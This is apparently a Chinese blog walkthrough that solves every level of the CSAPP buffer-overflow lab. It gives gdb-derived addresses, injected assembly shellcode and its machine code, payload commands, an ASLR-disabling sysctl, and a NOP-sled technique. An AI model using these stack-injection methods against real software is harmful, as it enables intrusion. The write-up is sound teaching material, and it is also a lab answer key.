這是CSAPP官網上的著名實驗,通過注入匯編代碼實現堆棧溢出攻擊。
實驗材料可到我的github倉庫 https://github.com/Cheukyin/CSAPP-LAB/ 選擇buffer-overflow分支下載
linux默認開啟ASLR,每次加載程序,變量地址都會不一樣,所以若要關閉ASLR: sysctl -w kernel.randomize_va_space=0(賦值為2,即可打開ASLR) 不過本實驗的程序似乎經過特殊處理,不需要關閉ASLR 正常編譯的程序的stack是non-executable的,但是加一個編譯選項就可以打開 本實驗的程序應該都打開了executable選項了 Level0: 修改getbuf()的返回地址,讓程序執行smoke 打開gdb,設置斷點至getbuf, r -u cheukyin
1 80491f4: 55 push %ebp 2 80491f5: 89 e5 mov %esp,%ebp 3 80491f7: 83 ec 38 sub $0x38,%esp 4 80491fa: 8d 45 d8 lea -0x28(%ebp),%eax 5 80491fd: 89 04 24 mov %eax,(%esp) 6 8049200: e8 f5 fa ff ff call 8048cfa <Gets> 7 8049205: b8 01 00 00 00 mov $0x1,%eax 8 804920a: c9 leave 9 804920b: c3 ret
以上代碼標明buf的地址是ebp-0x28,地址存放在eax中 print $ebp+4 ==> 0x55683884 print eax ==> 0x55683858 兩者相差44個字節,因此需要輸入44個普通字符,在輸入smoke的地址 print smoke ==> 0x8048c18 hex結果保存在level0-smoke-hex.txt ./hex2raw < level0-smoke-hex.txt|./bufbomb_32 -u cheukyin 即可過關
Level1: 跟上面類似,執行fizz(),不過fizz有一個參數需要壓棧,這個參數需要跟cookie相等 因此除了修改getbuf返回地址,還需要輸入四字節當作fizz的返回地址,再輸入4字節cookie ./makecookie cheukyin 可獲取cookie 反匯編可獲取fizz返回地址 ./hex2raw<level1-fizz-hex.txt | ./bufbomb_32 -u cheukyin 通關
Level2: 修改全局變量global_value的值,並進入bang函數 要修改global_value,便需在stack上注入一段修改的代碼,執行完get_buf後jump到該代碼, 代碼執行完後便jump到bang level2-firecracker-assembly.S為注入代碼:
1 # push the address of bang onto stack 2 pushl $0x08048c9d 3 4 # in gdb, print &global_value ==> 0x804d100 5 # mov cheukyin cookie to global_value 6 mov $0x3955ae84, %eax 7 mov %eax, 0x804d100 8 9 # jump to <bang> 10 ret
先把bang地址壓棧,然後修改global_value的值為cheukin的cookie,最後ret跳轉至bang gcc -m32 -c level2-firecracker-assembly.S生成目標文件 objdump -d level2-firecracker-assembly.o > level2-firecracker-assembly.d反匯編 level2-firecracker-assembly.d:
1 0: 68 9d 8c 04 08 push $0x8048c9d 2 5: b8 84 ae 55 39 mov $0x3955ae84,%eax 3 a: a3 00 d1 04 08 mov %eax,0x804d100 4 f: c3 ret
gdb: print $ebp+8 ==> 0x55683888 把機器碼填充到上面的地址,然後把get_buf返回地址修改為上面的地址即可 ./hex2raw<level2-bang-hex.txt | ./bufbomb_32 -u cheukyin可過關 Level3: 令getbuf返回cookie給test,因此不能破壞test的stack frame, 所以只能把注入代碼寫在輸入字符串的開頭,也就是buf地址 另外,當返回test時需要恢復正確的ebp,因此輸入字符串中在返回地址之前應寫入ebp: 在getbuf中, x/wx $ebp ==> 0x55683880 返回地址應是buf地址: print $ebp-0x28 ==> 0x55683858 注入代碼需要把cookie移入eax,並返回正確的地址:
1 #in getbuf: x/wx $ebp+4 ==> 0x08048dbe 2 #push get_buf's return address 3 pushl $0x08048dbe 4 5 #return cheukyin's cookie to test 6 movl $0x3955ae84, %eax 7 8 #return to <test> 9 ret
gcc -m32 -c level3-Dynamite-assembly.S objdump -d level3-Dynamite-assembly.o > level3-Dynamite-assembly.d 把生成的機器碼填入buf ./hex2raw<level3-Dynamite-hex.txt | ./bufbomb_32 -u cheukyin通關 Level4: 最後一關的要求和上一關一致,不過需要加上-n參數運行bufbomb, 此時會進入testn和getbufn函數而不是test和getbuf函數。 與之前不同在於,為模擬真實環境具有不定數量環境變量在stack frame的上方, 進入getbufn時的ebp值不是固定值, 讀取字符串緩沖區大小由32變為512,而且會調用testn函數五次, 意味著需要輸入五次字符串並全部通過才能通過。 由於testn()的ebp值不固定,首先需要確定如何恢復該值。 需要注意到一個事實,esp和ebp距離是固定的. 由testn的匯編代碼:
1 2 8048e26: 55 push %ebp 3 8048e27: 89 e5 mov %esp,%ebp 4 8048e29: 53 push %ebx 5 8048e2a: 83 ec 24 sub $0x24,%esp 6 8048e2d: e8 5e ff ff ff call 8048d90 <uniqueval> 7 8048e32: 89 45 f4 mov %eax,-0xc(%ebp) 8 8048e35: e8 d2 03 00 00 call 804920c <getbufn> 9 8048e3a: 89 c3 mov %eax,%ebx
getbufn正常返回後應回到8048e3a,此時 ebp=esp+0x28 因此注入代碼應增加利用esp恢復ebp的語句 如下:
1 #testn's ebp is fixed 2 #read <testn>'s assembly code and calculate 3 lea 0x28(%esp), %ebp 4 5 #look into bufbomb_32.S 6 #push getbufn's return address 7 pushl $0x08048e3a 8 9 #return cheukyin's cookie to test 10 movl $0x3955ae84, %eax 11 12 #return to <testn> 13 ret
查看其機器碼:
1 2 0: 8d 6c 24 28 lea 0x28(%esp),%ebp 3 4: 68 3a 8e 04 08 push $0x8048e3a 4 9: b8 84 ae 55 39 mov $0x3955ae84,%eax 5 e: c3 ret
此時,還有另一個難題,ebp不固定,則getbufn中的字串數組buf地址也是不固定的. 如何修改getbufn返回地址來執行注入代碼呢? 通過gdb查看讀入getbufn內字符串buf的地址(即eax), 對於同樣的userid會給出一樣的地址序列, 目測是以userid為seed的偽隨機,五次運行給出的地址分別為:
1 0x55683678 2 0x55683698 3 0x556836c8 4 0x556835f8 5 0x55683668
根據提示采用nop sleds的技術, 大意是:在不清楚有效機器代碼的入口地址時, 可以在有效機器代碼前以大量的nop機器指令(0x90)填充, 只要跳轉地址處於這些nop上就能到達有效機器代碼。 由於棧上的機器代碼是按地址由低向高順序執行, 要保證五次運行都能順利執行有效機器代碼, 需要滿足:跳轉地址位於有效機器代碼入口地址之前的nop機器指令填充區。 這要求盡可能增大nop填充區,盡可能使有效機器代碼段往後挪。 因此返回地址選用最高的地址: 0x556836c8 由getbufn匯編代碼 8049215: 8d 85 f8 fd ff ff lea -0x208(%ebp),%eax 可知buf地址和存放返回地址的單元相隔 0x208+4 = 0x20c 個字節 而注入代碼共15個字節,因此共需要在buf開頭填充 0x20c-15 個nop(0x90) 然後在填入機器碼和返回地址 ./hex2raw -n <level4-Nitroglycerin-hex.txt|./bufbomb_32 -u cheukyin -n 通關 ./hex2raw 的 -n 選項可讓hex2raw重復多次輸入